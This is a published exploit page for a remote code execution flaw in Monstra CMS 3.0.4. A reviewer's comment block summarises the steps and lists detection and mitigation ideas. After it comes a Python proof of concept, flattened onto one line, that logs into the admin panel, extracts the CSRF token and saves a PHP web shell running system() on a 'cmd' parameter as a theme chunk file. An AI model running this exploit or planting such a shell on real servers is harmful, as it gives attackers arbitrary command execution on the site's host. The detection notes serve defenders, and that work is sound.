Monstra CMS 3.0.4 Remote Code Execution
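Monstra CMS version 3.0.4 suffers from a remote code execution vulnerability. Original discovery of code execution in this version is attributed to Ishaq Mohammed in December of 2017. The proof of concept below is authenticated: it takes an admin-panel username and password as arguments and logs in before doing anything else.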
# NOTE(review): this listing lost its line breaks and indentation during
# extraction. Statement boundaries, the end of the inline comment, and the
# original line breaks inside the triple-quoted PHP string cannot be recovered
# with certainty. As printed, the whole line parses as one Python comment.
#
# What the script does, as far as the visible statements show:
#   1. Reads <url> <username> <password> from argv and opens a requests.Session.
#   2. POSTs the credentials to /admin/index.php?id=dashboard and treats the
#      word 'Dashboard' in the response body as a successful login.
#   3. GETs /admin/index.php?id=themes&action=add_chunk and pulls the hidden
#      "csrf" form field out of the HTML with a regex. The inline Turkish
#      comment reads: "access the edit page to find the CSRF token".
#   4. POSTs a new theme chunk to the same URL. The chunk name is 5 random
#      lowercase/digit characters and its content is PHP that passes the
#      `cmd` GET parameter to system().
#   5. Prints a path under /public/themes/default/<name>.chunk.php.
#
# Security-relevant point: the admin theme editor is used as intended, so valid
# admin credentials are a precondition. The flaw shown is that chunk content is
# stored as a .php file at a path the script expects to be web-reachable.
#
# Detection and triage pointers derived from the requests above:
#   - POSTs to /admin/index.php with id=themes&action=add_chunk, especially
#     soon after a login from an unfamiliar source.
#   - New or unexpected *.chunk.php files under public/themes/default/.
#   - GET requests to a *.chunk.php path that carry a `cmd` query parameter.
#   - The script only checks for HTTP 200 on the final POST, so its
#     "shell is ready" message does not prove a file was written; confirm on
#     disk during incident response.
#
# Mitigation ideas (presumably applicable; verify against the deployment):
#   - Restrict who can reach /admin and rotate admin credentials.
#   - Deny direct HTTP access to *.chunk.php.
#   - Keep the theme directory non-writable by the web server user where the
#     site does not need in-browser theme editing.
# No fixed release is referenced on this page.
# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)# Date: 05.05.2024# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://monstra.org/# Software Link: https://monstra.org/monstra-3.0.4.zip# Version: 3.0.4# Tested on: MacOSimport requestsimport randomimport stringimport timeimport reimport sysif len(sys.argv) < 4:print("Usage: python3 script.py <url> <username> <password>")sys.exit(1)base_url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]session = requests.Session()login_url = f'{base_url}/admin/index.php?id=dashboard'login_data = {'login': username,'password': password,'login_submit': 'Log+In'}filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=5))print("Logging in...")response = session.post(login_url, data=login_data)if 'Dashboard' in response.text:print("Login successful")else:print("Login failed")exit()time.sleep(3)edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'response = session.get(edit_url) # CSRF token bulmak için edit sayfasınaerişimtoken_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="(.*?)"', response.text)if token_search:token = token_search.group(1)else:print("CSRF token could not be found.")exit()content = '''<html><body><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?phpif(isset($_GET['cmd'])){system($_GET['cmd']);}?></pre></body></html>'''edit_data = {'csrf': token,'name': filename,'content': content,'add_file': 'Save'}print("Preparing shell...")response = session.post(edit_url, data=edit_data)time.sleep(3)if response.status_code == 200:print(f"Your shell is ready: {base_url}/public/themes/default/{filename}.chunk.php")else:print("Failed to prepare shell.")